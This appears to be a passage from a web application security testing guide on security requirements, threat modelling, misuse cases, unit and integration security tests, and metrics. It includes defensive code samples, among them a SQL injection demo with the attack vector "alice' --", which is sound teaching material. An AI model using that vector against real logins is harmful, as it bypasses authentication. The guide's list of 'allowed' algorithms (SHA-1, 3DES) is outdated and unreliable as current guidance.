From the functionality perspective, the validation of security requirements is the main objective of security testing, while, from the risk management perspective, it is the objective of information security assessments. At a high level, the main goal of information security assessments is the identification of gaps in security controls, such as lack of basic authentication, authorization, or encryption controls. In more depth, the security assessment objective is risk analysis, such as the identification of potential weaknesses in security controls that ensure the confidentiality, integrity, and availability of the data. For example, when the application deals with personally identifiable information (PII) and sensitive data, the security requirement to be validated is compliance with the company's information security policy requiring encryption of such data in transit and in storage. Assuming encryption is used to protect the data, encryption algorithms and key lengths need to comply with the organization's encryption standards. These might require that only certain algorithms and key lengths be used. For example, a security requirement that can be security tested is verifying that only allowed cryptographic algorithms are used (e.g., SHA-1, RSA, 3DES) with allowed minimum key lengths (e.g., more than 128 bits for symmetric and more than 1024 bits for asymmetric encryption).&lt;br /&gt;
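A compliance check of this kind can itself be automated. The sketch below is hypothetical (the class name and allow-list table are invented for illustration), with algorithms and minimum key lengths taken from the example above:&lt;br /&gt;

```java
import java.util.Map;

public class CipherPolicy {
    // Hypothetical allow-list: approved algorithm names mapped to the minimum
    // acceptable key length in bits (128 symmetric, 1024 asymmetric, per the
    // example in the text).
    static final Map MINIMUM_KEY_BITS = Map.of("3DES", 128, "RSA", 1024);

    public static boolean isAllowed(String algorithm, int keyBits) {
        Integer minimum = (Integer) MINIMUM_KEY_BITS.get(algorithm);
        if (minimum == null) {
            return false; // algorithm is not on the allow-list at all
        }
        return keyBits >= minimum;
    }
}
```

Checking RSA at 2048 bits would pass, while an unlisted algorithm or an undersized key would fail the check.&lt;br /&gt;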
&lt;br /&gt;
From the security assessment perspective, security requirements can be validated at different phases of the SDLC by using different artifacts and testing methodologies. For example, threat modeling focuses on identifying security flaws during design, secure code analysis and reviews focus on identifying security issues in source code during development, and penetration testing focuses on identifying vulnerabilities in the application during testing/validation. &lt;br /&gt;
&lt;br /&gt;
Security issues that are identified early in the SDLC can be documented in a test plan so they can be validated later with security tests. By combining the results of different testing techniques, it is possible to derive better security test cases and increase the level of assurance of the security requirements. For example, distinguishing true vulnerabilities from un-exploitable ones is possible when the results of penetration tests and source code analysis are combined. Considering the security test for a SQL injection vulnerability, for example, a black box test might involve first a scan of the application to fingerprint the vulnerability. The first evidence of a potential SQL injection vulnerability that can be validated is the generation of a SQL exception. A further validation of the SQL injection vulnerability might involve manually injecting attack vectors to modify the grammar of the SQL query for an information disclosure exploit. This might involve a lot of trial-and-error analysis until the malicious query is executed. Assuming the tester has the source code, source code analysis might reveal how to construct the SQL attack vector that can exploit the vulnerability (e.g., execute a malicious query returning confidential data to an unauthorized user).&lt;br /&gt;
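The attack-vector construction described above can be illustrated with a minimal, self-contained sketch using an in-memory SQLite database; the table and column names are hypothetical. It shows why a string-built query is exploitable and why the parameterized form, the usual countermeasure, is not:&lt;br /&gt;

```python
import sqlite3

# Minimal in-memory schema; table and column names are illustrative.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

def login_unsafe(user, pwd):
    # Vulnerable: attacker-controlled input alters the grammar of the query.
    q = "SELECT * FROM users WHERE username = '%s' AND password = '%s'" % (user, pwd)
    return conn.execute(q).fetchall()

def login_safe(user, pwd):
    # Countermeasure: a parameterized query keeps input as data, not SQL.
    q = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(q, (user, pwd)).fetchall()

# Classic attack vector: the SQL comment '--' removes the password check.
vector = "alice' --"
```

With the vector above, `login_unsafe` returns alice's row despite an empty password, while `login_safe` returns nothing; a security test case can assert exactly this difference.&lt;br /&gt;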
&lt;br /&gt;
'''Threats and Countermeasures Taxonomies'''&amp;lt;br&amp;gt;&lt;br /&gt;
A ''threat and countermeasure classification'' that takes into consideration root causes of vulnerabilities is the critical factor to verify that security controls are designed, coded, and built so that the impact due to the exposure of such vulnerabilities is mitigated. In the case of web applications, the exposure of security controls to common vulnerabilities, such as the OWASP Top Ten, can be a good starting point to derive general security requirements. More specifically, the web application security frame [17] provides a classification (i.e., a taxonomy) of vulnerabilities that can be documented in different guidelines and standards and validated with security tests. &lt;br /&gt;
&lt;br /&gt;
The focus of a threat and countermeasure categorization is to define security requirements in terms of the threats and the root cause of the vulnerability. A threat can be categorized by using STRIDE [18], for example, as Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege. The root cause can be categorized as a security flaw in design, a security bug in coding, or an issue due to insecure configuration. For example, the root cause of a weak authentication vulnerability might be the lack of mutual authentication when data crosses a trust boundary between the client and server tiers of the application. A security requirement that captures the threat of non-repudiation during an architecture design review allows for the documentation of the requirement for the countermeasure (e.g., mutual authentication) that can be validated later on with security tests.&lt;br /&gt;
&lt;br /&gt;
A threat and countermeasure categorization for vulnerabilities can also be used to document security requirements for secure coding, such as secure coding standards. An example of a common coding error in authentication controls consists of applying a hash function to a password without applying a salt to the value. From the secure coding perspective, this is a vulnerability that affects the encryption used for authentication, with a root cause in a coding error. Since the root cause is insecure coding, the security requirement can be documented in secure coding standards and validated through secure code reviews during the development phase of the SDLC.&lt;br /&gt;
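A minimal sketch of the countermeasure, using an iterated, salted digest (PBKDF2, as available in the Python standard library) instead of a bare unsalted hash; the function names are illustrative:&lt;br /&gt;

```python
import hashlib, hmac, os

def hash_password(password, salt=None):
    # A unique random salt per password defeats precomputed dictionaries.
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest

def verify_password(password, salt, digest):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return hmac.compare_digest(candidate, digest)  # constant-time comparison
```

Because each password gets its own random salt, identical passwords produce different stored digests, which is exactly the property a secure code review would check for when validating this requirement.&lt;br /&gt;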
&lt;br /&gt;
'''Security Testing and Risk Analysis'''&amp;lt;br&amp;gt;&lt;br /&gt;
Security requirements need to take into consideration the severity of the vulnerabilities to support a ''risk mitigation strategy''. Assuming that the organization maintains a repository of vulnerabilities found in applications, i.e., a vulnerability knowledge base, the security issues can be reported by type, issue, mitigation, root cause, and mapped to the applications where they are found. Such a vulnerability knowledge base can also be used to establish metrics to analyze the effectiveness of the security tests throughout the SDLC.&lt;br /&gt;
 &lt;br /&gt;
For example, consider an input validation issue, such as a SQL injection, which was identified via source code analysis and reported with a coding error root cause and input validation vulnerability type. The exposure of such a vulnerability can be assessed via a penetration test, by probing input fields with several SQL injection attack vectors. This test might validate that special characters are filtered before hitting the database, mitigating the vulnerability. By combining the results of source code analysis and penetration testing it is possible to determine the likelihood and exposure of the vulnerability and calculate the risk rating of the vulnerability. By reporting vulnerability risk ratings in the findings (e.g., test report) it is possible to decide on the mitigation strategy. For example, high and medium risk vulnerabilities can be prioritized for remediation, while low risk ones can be fixed in further releases.&lt;br /&gt;
&lt;br /&gt;
By considering the threat scenarios exploiting common vulnerabilities it is possible to identify potential risks for which the application security control needs to be security tested. For example, the OWASP Top Ten vulnerabilities can be mapped to attacks such as phishing, privacy violations, identity theft, system compromise, data alteration or data destruction, financial loss, and reputation loss. Such issues should be documented as part of the threat scenarios. By thinking in terms of threats and vulnerabilities, it is possible to devise a battery of tests that simulate such attack scenarios. Ideally, the organization vulnerability knowledge base can be used to derive security risk driven test cases to validate the most likely attack scenarios. For example, if identity theft is considered high risk, negative test scenarios should validate the mitigation of impacts deriving from the exploit of vulnerabilities in authentication, cryptographic controls, input validation, and authorization controls.&lt;br /&gt;
&lt;br /&gt;
===Functional and Non Functional Test Requirements===&lt;br /&gt;
'''Functional Security Requirements'''&amp;lt;br&amp;gt;&lt;br /&gt;
From the perspective of functional security requirements, the applicable standards, policies and regulations drive both the need for a type of security control as well as the control functionality. These requirements are also referred to as “positive requirements”, since they state the expected functionality that can be validated through security tests.&lt;br /&gt;
Examples of positive requirements are: “the application will lockout the user after six failed logon attempts” or “passwords need to be a minimum of six characters, alphanumeric”. The validation of positive requirements consists of asserting the expected functionality and, as such, can be done by re-creating the testing conditions, running the test according to predefined inputs, and asserting the expected outcome as a fail/pass condition.&lt;br /&gt;
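The lockout requirement above can be sketched as such a fail/pass test. The `Account` class here is an illustrative stand-in for the real authentication control, not an actual implementation:&lt;br /&gt;

```python
# Hypothetical stand-in for the authentication control under test.
class Account:
    MAX_FAILURES = 6   # positive requirement: lock out after six failures

    def __init__(self, password):
        self._password = password
        self.failures = 0
        self.locked = False

    def logon(self, attempt):
        if self.locked:
            return False
        if attempt == self._password:
            self.failures = 0
            return True
        self.failures += 1
        if self.failures >= self.MAX_FAILURES:
            self.locked = True
        return False

def test_lockout_after_six_failures():
    acct = Account("correct-horse")
    for _ in range(6):
        assert not acct.logon("wrong")     # predefined inputs
    assert acct.locked                     # expected outcome: account locked
    assert not acct.logon("correct-horse") # even the right password is rejected
```

The test re-creates the condition (six failed attempts with predefined inputs) and asserts the expected outcome as a pass/fail condition.&lt;br /&gt;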
&lt;br /&gt;
In order to validate security requirements with security tests, security requirements need to be function driven and highlight the expected functionality (the what) and implicitly the implementation (the how). Examples of high-level security design requirements for authentication can be:&lt;br /&gt;
*Protect user credentials and shared secrets in transit and in storage&lt;br /&gt;
*Mask any confidential data in display (e.g., passwords, accounts)&lt;br /&gt;
*Lock the user account after a certain number of failed login attempts &lt;br /&gt;
*Do not show specific validation errors to the user as a result of failed logon &lt;br /&gt;
*Only allow passwords that are alphanumeric, include special characters, and are at least six characters long, to limit the attack surface&lt;br /&gt;
*Allow for password change functionality only to authenticated users by validating the old password, the new password, and the user answer to the challenge question, to prevent brute forcing of a password via password change.&lt;br /&gt;
*The password reset form should validate the user’s username and the user’s registered email before sending the temporary password to the user via email. The temporary password issued should be a one time password. A link to the password reset web page will be sent to the user. The password reset web page should validate the user temporary password, the new password, as well as the user answer to the challenge question.&lt;br /&gt;
&lt;br /&gt;
'''Risk Driven Security Requirements'''&amp;lt;br&amp;gt;&lt;br /&gt;
Security tests also need to be risk driven; that is, they need to validate the application for unexpected behavior. These are also called “negative requirements”, since they specify what the application should not do. &lt;br /&gt;
Examples of &amp;quot;should not do&amp;quot; (negative) requirements are:&lt;br /&gt;
* The application should not allow for the data to be altered or destroyed&lt;br /&gt;
* The application should not be compromised or misused for unauthorized financial transactions by a malicious user.&lt;br /&gt;
&lt;br /&gt;
Negative requirements are more difficult to test, because there is no expected behavior to look for. This might require a threat analyst to come up with unforeseeable input conditions, causes, and effects. This is where security testing needs to be driven by risk analysis and threat modeling.&lt;br /&gt;
The key is to document the threat scenarios and the functionality of the countermeasure as a factor to mitigate a threat. For example, in the case of authentication controls, the following security requirements can be documented from the threats and countermeasure perspective:&lt;br /&gt;
*Encrypt authentication data in storage and transit to mitigate risk of information disclosure and authentication protocol attacks&lt;br /&gt;
*Protect passwords using a non-reversible transformation, such as a digest (e.g., a hash) combined with a salt, to prevent dictionary attacks&lt;br /&gt;
*Lock out accounts after reaching a logon failure threshold and enforce password complexity to mitigate risk of brute force password attacks&lt;br /&gt;
*Display generic error messages upon validation of credentials to mitigate risk of account harvesting/enumeration&lt;br /&gt;
*Mutually authenticate client and server to prevent repudiation and Man-in-the-Middle (MiTM) attacks&lt;br /&gt;
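The generic-error-message countermeasure in the list above can be sketched as follows; the user store and message text are illustrative. The point is that the response is identical whether the username is unknown or the password is wrong, so error messages cannot be used for account harvesting:&lt;br /&gt;

```python
# Illustrative user store; in a real application this is a database lookup.
USERS = {"alice": "s3cret"}

GENERIC_ERROR = "Invalid username or password"

def authenticate(username, password):
    if username in USERS and USERS[username] == password:
        return "OK"
    # Deliberately do NOT distinguish "unknown user" from "bad password":
    # a distinct message would let an attacker enumerate valid accounts.
    return GENERIC_ERROR
```

A negative test case asserts that the responses for an unknown account and for a wrong password are indistinguishable.&lt;br /&gt;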
&lt;br /&gt;
Threat modeling artifacts such as threat trees and attack libraries can be useful to derive the negative test scenarios. A threat tree will assume a root attack (e.g., attacker might be able to read other users' messages) and identify different exploits of security controls (e.g., data validation fails because of a SQL injection vulnerability) and necessary countermeasures (e.g., implement data validation and parameterized queries) that could be validated to be effective in mitigating such attacks.&lt;br /&gt;
&lt;br /&gt;
===Security Requirements Derivation Through Use and Misuse Cases===&lt;br /&gt;
A prerequisite to describing the application functionality is understanding what the application is supposed to do and how. This can be done by describing ''use cases''. Use cases, in the graphical form as commonly used in software engineering, show the interactions of actors and their relations, and help to identify the actors in the application, their relationships, the intended sequence of actions for each scenario, alternative actions, special requirements, and pre- and post-conditions. Similar to use cases, ''misuse and abuse cases'' [19] describe unintended and malicious use scenarios of the application. These misuse cases provide a way to describe scenarios of how an attacker could misuse and abuse the application. By going through the individual steps in a use scenario and thinking about how it can be maliciously exploited, potential flaws or aspects of the application that are not well-defined can be discovered. The key is to describe all possible or, at least, the most critical use and misuse scenarios. Misuse scenarios allow the analysis of the application from the attacker's point of view and contribute to identifying potential vulnerabilities and the countermeasures that need to be implemented to mitigate the impact caused by the potential exposure to such vulnerabilities. Given all of the use and abuse cases, it is important to analyze them to determine which are the most critical and need to be documented in security requirements. The identification of the most critical misuse and abuse cases drives the documentation of security requirements and the necessary controls where security risks should be mitigated.&lt;br /&gt;
&lt;br /&gt;
To derive security requirements from use and misuse cases [20], it is important to define the functional scenarios and the negative scenarios, and put these in graphical form. In the case of derivation of security requirements for authentication, for example, the following step-by-step methodology can be followed.&lt;br /&gt;
&lt;br /&gt;
*Step 1: Describe the Functional Scenario: User authenticates by supplying username and password. The application grants access to users based upon authentication of user credentials by the application and provides specific errors to the user when validation fails.&lt;br /&gt;
&lt;br /&gt;
*Step 2: Describe the Negative Scenario: Attacker breaks the authentication through a brute force/dictionary attack of passwords and account harvesting vulnerabilities in the application. The validation errors provide specific information to an attacker to guess which accounts are actually valid, registered accounts (usernames). The attacker then tries to brute force the password for such a valid account. A brute force attack against passwords of minimum length four composed only of digits can succeed within a limited number of attempts (i.e., 10^4).&lt;br /&gt;
&lt;br /&gt;
*Step 3: Describe Functional and Negative Scenarios With Use and Misuse Case: The graphical example in Figure below depicts the derivation of security requirements via use and misuse cases. The functional scenario consists of the user actions (entering username and password) and the application actions (authenticating the user and providing an error message if validation fails). The misuse case consists of the attacker actions, i.e., trying to break authentication by brute forcing the password via a dictionary attack and by guessing the valid usernames from error messages. By graphically representing the threats to the user actions (misuses), it is possible to derive the countermeasures as the application actions that mitigate such threats.&lt;br /&gt;
[[Image:UseAndMisuseCase.jpg]]&lt;br /&gt;
&lt;br /&gt;
*Step 4: Elicit The Security Requirements. In this case, the following security requirements for authentication are derived: &lt;br /&gt;
:1) Passwords need to be alphanumeric, include lower and upper case, and be a minimum of seven characters in length&lt;br /&gt;
:2) Accounts need to lockout after five unsuccessful login attempts&lt;br /&gt;
:3) Logon error messages need to be generic&lt;br /&gt;
These security requirements need to be documented and tested.&lt;br /&gt;
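The three elicited requirements can be expressed directly as testable artifacts. In this sketch, `password_meets_policy` is an illustrative stand-in for the real password control, and the constants capture requirements 2 and 3:&lt;br /&gt;

```python
import re

def password_meets_policy(pwd):
    """Requirement 1: alphanumeric, lower and upper case, minimum seven
    characters in length."""
    return (len(pwd) >= 7
            and re.search(r"[a-z]", pwd) is not None
            and re.search(r"[A-Z]", pwd) is not None
            and re.search(r"[0-9]", pwd) is not None)

LOCKOUT_THRESHOLD = 5                  # Requirement 2: lock out after five failures
GENERIC_LOGON_ERROR = "Logon failed"   # Requirement 3: generic error message
```

Documenting the requirements in this executable form makes them straightforward to validate in every build.&lt;br /&gt;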
&lt;br /&gt;
===Security Tests Integrated in Developers' and Testers' Workflows===&lt;br /&gt;
'''Developers' Security Testing Workflow'''&amp;lt;br&amp;gt;&lt;br /&gt;
Security testing during the development phase of the SDLC represents the first opportunity for developers to ensure that individual software components that they have developed are security tested before they are integrated with other components and built into the application. Software components might consist of software artifacts such as functions, methods, and classes, as well as application programming interfaces, libraries, and executables. For security testing, developers can rely on the results of the source code analysis to verify statically that the developed source code does not include potential vulnerabilities and is compliant with the secure coding standards. Security unit tests can further verify dynamically (i.e., at run time) that the components function as expected.  Before integrating both new and existing code changes in the application build, the results of the static and dynamic analysis should be reviewed and validated. &lt;br /&gt;
The validation of source code before integration in application builds is usually the responsibility of the senior developer. This senior developer is also the subject matter expert in software security, whose role is to lead the secure code review and make decisions whether to accept the code to be released in the application build or to require further changes and testing. This secure code review workflow can be enforced via formal acceptance as well as a check in a workflow management tool. For example, assuming the typical defect management workflow used for functional bugs, security bugs that have been fixed by a developer can be reported on a defect or change management system. The build master can look at the test results reported by the developers in the tool and grant approvals for checking in the code changes into the application build.&lt;br /&gt;
&lt;br /&gt;
'''Testers' Security Testing Workflow'''&amp;lt;br&amp;gt;&lt;br /&gt;
After components and code changes are tested by developers and checked in to the application build, the most likely next step in the software development process workflow is to perform tests on the application as a whole entity. This level of testing is usually referred to as integrated test and system level test. When security tests are part of these testing activities, they can be used to validate both the security functionality of the application as a whole, as well as the exposure to application level vulnerabilities. These security tests on the application include both white box testing, such as source code analysis, and black box testing, such as penetration testing. Gray box testing is similar to black box testing, except that the tester is assumed to have some partial knowledge of the application; for example, partial knowledge of the session management implementation can help in understanding whether the logout and timeout functions are properly secured.&lt;br /&gt;
&lt;br /&gt;
The target for the security tests is the complete system, that is, the artifact that will potentially be attacked, which includes both the whole source code and the executable. One peculiarity of security testing during this phase is that it is possible for security testers to determine whether vulnerabilities can be exploited and expose the application to real risks. &lt;br /&gt;
These include common web application vulnerabilities, as well as security issues that have been identified earlier in the SDLC with other activities such as threat modeling, source code analysis, and secure code reviews. &lt;br /&gt;
&lt;br /&gt;
Usually, testing engineers, rather than software developers, perform security tests when the application is in scope for integration system tests. Such testing engineers have security knowledge of web application vulnerabilities, black box and white box security testing techniques, and own the validation of security requirements in this phase. In order to perform such security tests, it is a pre-requisite that security test cases are documented in the security testing guidelines and procedures.&lt;br /&gt;
&lt;br /&gt;
A testing engineer who validates the security of the application in the integrated system environment might release the application for testing in the operational environment (e.g., user acceptance tests). At this stage of the SDLC (i.e., validation), the application functional testing is usually a responsibility of QA testers, while white-hat hackers/security consultants are usually responsible for security testing. Some organizations rely on their own specialized ethical hacking team in order to conduct such tests when a third party assessment is not required (such as for auditing purposes). &lt;br /&gt;
&lt;br /&gt;
Since these tests are the last resort for fixing vulnerabilities before the application is released to production, it is important that such issues are addressed as recommended by the testing team (e.g., the recommendations can include code, design, or configuration change). At this level, security auditors and information security officers discuss the reported security issues and analyze the potential risks according to information risk management procedures. Such procedures might require the developer team to fix all high risk vulnerabilities before the application could be deployed, unless such risks are acknowledged and accepted.&lt;br /&gt;
&lt;br /&gt;
===Developers' Security Tests===&lt;br /&gt;
'''Security Testing in the Coding Phase: Unit Tests'''&amp;lt;br&amp;gt;&lt;br /&gt;
From the developer’s perspective, the main objective of security tests is to validate that code is being developed in compliance with secure coding standards requirements. Developers' own coding artifacts such as functions, methods, classes, APIs, and libraries need to be functionally validated before being integrated into the application build. &lt;br /&gt;
&lt;br /&gt;
The security requirements that developers have to follow should be documented in secure coding standards and validated with static and dynamic analysis. As a testing activity following a secure code review, unit tests can validate that code changes required by secure code reviews are properly implemented. Secure code reviews and source code analysis through source code analysis tools help developers in identifying security issues in source code as it is developed. By using unit tests and dynamic analysis (e.g., debugging) developers can validate the security functionality of components as well as verify that the countermeasures being developed mitigate any security risks previously identified through threat modeling and source code analysis. &lt;br /&gt;
&lt;br /&gt;
A good practice for developers is to build security test cases as a generic security test suite that is part of the existing unit testing framework. A generic security test suite could be derived from previously defined use and misuse cases to security test functions, methods and classes. A generic security test suite might include security test cases to validate both positive and negative requirements for security controls such as:&lt;br /&gt;
* Authentication &amp;amp; Access Control&lt;br /&gt;
* Input Validation &amp;amp; Encoding&lt;br /&gt;
* Encryption&lt;br /&gt;
* User and Session Management&lt;br /&gt;
* Error and Exception Handling&lt;br /&gt;
* Auditing and Logging&lt;br /&gt;
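A generic suite of this kind can be hooked into whichever unit testing framework the team already uses. The sketch below uses Python's unittest as an example; `validate_input` is an illustrative stand-in for the input validation control under test, not a real implementation:&lt;br /&gt;

```python
import unittest

# Hypothetical input validation control under test.
def validate_input(value, max_len=32):
    # Whitelist validation: non-empty, alphanumeric only, bounded length.
    return value.isalnum() and max_len >= len(value) > 0

class InputValidationTests(unittest.TestCase):
    """Reusable security test cases for the Input Validation category."""

    def test_rejects_sql_metacharacters(self):
        self.assertFalse(validate_input("alice' --"))

    def test_rejects_overlong_input(self):
        self.assertFalse(validate_input("a" * 33))

    def test_rejects_empty_input(self):
        self.assertFalse(validate_input(""))

    def test_accepts_normal_input(self):
        self.assertTrue(validate_input("alice01"))
```

Analogous test classes can be written for each category in the list, so positive and negative security assertions run alongside the existing functional unit tests on every build.&lt;br /&gt;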
&lt;br /&gt;
Developers empowered with a source code analysis tool integrated into their IDE, secure coding standards, and a security unit testing framework can assess and verify the security of the software components being developed. Security test cases can be run to identify potential security issues that have root causes in source code: besides input and output validation of parameters entering and exiting the components, these issues include authentication and authorization checks done by the component, protection of the data within the component, secure exception and error handling, and secure auditing and logging. Unit test frameworks such as JUnit, NUnit, and CUnit can be adapted to verify security test requirements. In the case of security functional tests, unit level tests can test the functionality of security controls at the software component level, such as functions, methods, or classes. For example, a test case could validate input and output validation (e.g., variable sanitization) and boundary checks for variables by asserting the expected functionality of the component.&lt;br /&gt;
&lt;br /&gt;
The threat scenarios identified with use and misuse cases can be used to document the procedures for testing software components. In the case of authentication components, for example, security unit tests can assert the functionality of setting an account lockout as well as the fact that user input parameters cannot be abused to bypass the account lockout (e.g., by setting the account lockout counter to a negative number). At the component level, security unit tests can validate positive assertions as well as negative assertions, such as errors and exception handling. Exceptions should be caught without leaving the system in an insecure state, such as potential denial of service caused by resources not being deallocated (e.g., connection handles not closed within a final statement block), as well as potential elevation of privileges (e.g., higher privileges acquired before the exception is thrown and not re-set to the previous level before exiting the function). Secure error handling can validate potential information disclosure via informative error messages and stack traces. &lt;br /&gt;
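The negative assertion about the lockout counter can be sketched as follows; `LockoutCounter` is an illustrative stand-in for the real control. The test asserts that user-supplied input cannot wind the counter back (e.g., via a negative number):&lt;br /&gt;

```python
# Hypothetical lockout counter component under unit test.
class LockoutCounter:
    def __init__(self, threshold=5):
        self.threshold = threshold
        self.failures = 0

    def record_failures(self, count):
        # Reject anything that is not a non-negative integer, so input
        # cannot be abused to reset or wrap the counter.
        if not (isinstance(count, int) and count >= 0):
            raise ValueError("failure count must be a non-negative integer")
        self.failures += count

    @property
    def locked(self):
        return self.failures >= self.threshold

def test_negative_input_cannot_unlock():
    counter = LockoutCounter()
    counter.record_failures(5)
    assert counter.locked
    try:
        counter.record_failures(-5)   # attack: try to wind the counter back
    except ValueError:
        pass
    assert counter.locked             # negative assertion: still locked
```

This is a component-level negative test: it does not check that the feature works, but that a specific abuse of it fails safely.&lt;br /&gt;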
&lt;br /&gt;
Unit level security test cases can be developed by a security engineer who is the subject matter expert in software security and is also responsible for validating that the security issues in the source code have been fixed and can be checked into the integrated system build.  Typically, the manager of the application builds also makes sure that third-party libraries and executable files are security assessed for potential vulnerabilities before being integrated in the application build.&lt;br /&gt;
&lt;br /&gt;
Threat scenarios for common vulnerabilities that have root causes in insecure coding can also be documented in the developer’s security testing guide. When a fix is implemented for a coding defect identified with source code analysis, for example, security test cases can verify that the implementation of the code change follows the secure coding requirements documented in the secure coding standards. &lt;br /&gt;
&lt;br /&gt;
Source code analysis and unit tests can validate that the code change mitigates the vulnerability exposed by the previously identified coding defect. The results of automated secure code analysis can also be used as automatic check-in gates for version control: software artifacts cannot be checked into the build with high or medium severity coding issues.&lt;br /&gt;
&lt;br /&gt;
===Functional Testers' Security Tests===&lt;br /&gt;
'''Security Testing During the Integration and Validation Phase: Integrated System Tests and Operation Tests'''&amp;lt;br&amp;gt;&lt;br /&gt;
The main objective of integrated system tests is to validate the “defense in depth” concept, that is, that the implementation of security controls provides security at different layers. For example, the lack of input validation when calling a component integrated with the application is often a factor that can be tested with integration testing. &lt;br /&gt;
&lt;br /&gt;
The integration system test environment is also the first environment where testers can simulate real attack scenarios as can be potentially executed by a malicious external or internal user of the application. Security testing at this level can validate whether vulnerabilities are real and can be exploited by attackers. For example, a potential vulnerability found in source code can be rated as high risk because of the exposure to potential malicious users, as well as because of the potential impact (e.g., access to confidential information).&lt;br /&gt;
Real attack scenarios can be tested with both manual testing techniques and penetration testing tools. Security tests of this type are also referred to as ethical hacking tests. From the security testing perspective, these are risk driven tests and have the objective to test the application in the operational environment. The target is the application build that is representative of the version of the application being deployed into production.&lt;br /&gt;
&lt;br /&gt;
The execution of security tests in the integration and validation phase is critical to identifying vulnerabilities due to integration of components as well as validating the exposure of such vulnerabilities. Since application security testing requires a specialized set of skills, which includes both software and security knowledge and is not typical of security engineers, organizations are often required to security-train their software developers on ethical hacking techniques, security assessment procedures and tools. A realistic scenario is to develop such resources in-house and document them in security testing guides and procedures that take into account the developer’s security testing knowledge. A so called “security test cases cheat list or check-list”, for example, can provide simple test cases and attack vectors that can be used by testers to validate exposure to common vulnerabilities such as spoofing, information disclosures, buffer overflows, format strings, SQL injection and XSS injection, XML, SOAP, canonicalization issues, denial of service, and managed code and ActiveX controls (e.g., .NET). A first battery of these tests can be performed manually with a very basic knowledge of software security. The first objective of security tests might be the validation of a set of minimum security requirements. These security test cases might consist of manually forcing the application into error and exceptional states, and gathering knowledge from the application behavior. For example, SQL injection vulnerabilities can be tested manually by injecting attack vectors through user input and by checking if SQL exceptions are thrown back to the user. The evidence of a SQL exception error might be a manifestation of a vulnerability that can be exploited. A more in-depth security test might require the tester’s knowledge of specialized testing techniques and tools. 
Besides source code analysis and penetration testing, these techniques include, for example, source code and binary fault injection, fault propagation analysis and code coverage, fuzz testing, and reverse engineering. The security testing guide should provide procedures and recommend tools that can be used by security testers to perform such in-depth security assessments.&lt;br /&gt;
&lt;br /&gt;
The next level of security testing after integration system tests is to perform security tests in the user acceptance environment. There are unique advantages to performing security tests in the operational environment. The user acceptance tests environment (UAT) is the one that is most representative of the release configuration, with the exception of the data (e.g., test data is used in place of real data). A characteristic of security testing in UAT is testing for security configuration issues. In some cases these vulnerabilities might represent high risks. For example, the server that hosts the web application might not be configured with minimum privileges, a valid SSL certificate, and a secure configuration, might have non-essential services enabled, and might have a web root directory that has not been cleaned of test and administration web pages.&lt;br /&gt;
&lt;br /&gt;
===Security Test Data Analysis and Reporting===&lt;br /&gt;
'''Goals for Security Test Metrics and Measurements'''&amp;lt;br&amp;gt;&lt;br /&gt;
The definition of the goals for the security testing metrics and measurements is a pre-requisite for using security testing data for risk analysis and management processes. For example, a measurement such as the total number of vulnerabilities found with security tests might quantify the security posture of the application. These measurements also help to identify security objectives for software security testing: for example, reducing the number of vulnerabilities to an acceptable number (minimum) before the application is deployed into production. &lt;br /&gt;
&lt;br /&gt;
Another manageable goal could be to compare the application security posture against a baseline to assess improvements in application security processes. For example, the security metrics baseline might consist of an application that was tested only with penetration tests. The security data obtained from an application that was also security tested during coding should show an improvement (e.g., a smaller number of vulnerabilities) when compared with the baseline.&lt;br /&gt;
&lt;br /&gt;
In traditional software testing, the number of software defects, such as the bugs found in an application, could provide a measure of software quality. Similarly, security testing can provide a measure of software security. From the defect management and reporting perspective, software quality and security testing can use similar categorizations for root causes and defect remediation efforts. From the root cause perspective, a security defect can be due to an error in design (e.g., security flaws) or due to an error in coding (e.g., security bug). From the perspective of the effort required to fix a defect, both security and quality defects can be measured in terms of developer hours to implement the fix, the tools and resources required to fix, and, finally, the cost to implement the fix.&lt;br /&gt;
&lt;br /&gt;
A characteristic of security test data, compared to quality data, is the categorization in terms of the threat, the exposure of the vulnerability, and the potential impact posed by the vulnerability to determine the risk. Testing applications for security consists of managing technical risks to make sure that the application countermeasures meet acceptable levels. For this reason, security testing data needs to support the security risk strategy at critical checkpoints during the SDLC. For example, vulnerabilities found in source code with source code analysis represent an initial measure of risk. Such a measure of risk (e.g., high, medium, low) for the vulnerability can be calculated by determining the exposure and likelihood factors, and further by validating the vulnerability with penetration tests. The risk metrics associated with vulnerabilities found by security tests empower business management to make risk management decisions, such as deciding whether risks can be accepted, mitigated, or transferred at different levels within the organization (e.g., business as well as technical).&lt;br /&gt;
&lt;br /&gt;
When evaluating the security posture of an application, it is important to take into consideration certain factors, such as the size of the application being developed. Application size has been statistically proven to be related to the number of issues found in the application during tests. One measure of application size is the number of lines of code (LOC) of the application. Typically, software quality defects range from about 7 to 10 defects per thousand lines of new and changed code [21]. Since one test pass alone can reduce the overall number of defects by about 25%, it is logical for larger applications to be tested more often than smaller applications.&lt;br /&gt;
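&lt;br /&gt;
To make the arithmetic above concrete, here is a small worked sketch using the figures quoted in the text (7–10 defects per thousand lines of new and changed code, and roughly a 25% reduction per test pass); the class and method names are invented for illustration:&lt;br /&gt;

```java
// Worked example of the defect-density figures quoted above: 7-10 defects per
// thousand lines of new and changed code, and roughly a 25% reduction per test pass.
public class DefectEstimate {

    // Expected defects remaining after one test pass.
    static double remaining(double kloc, double defectsPerKloc, double reductionPerPass) {
        double expected = kloc * defectsPerKloc;
        return expected * (1.0 - reductionPerPass);
    }

    public static void main(String[] args) {
        // 100,000 lines of new/changed code at the upper bound of 10 defects/KLOC:
        // 1000 expected defects, about 750 remaining after a single test pass.
        System.out.println(remaining(100.0, 10.0, 0.25));
    }
}
```

The larger the code base, the larger the absolute number of residual defects after each pass, which is why bigger applications warrant more frequent testing.&lt;br /&gt;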
&lt;br /&gt;
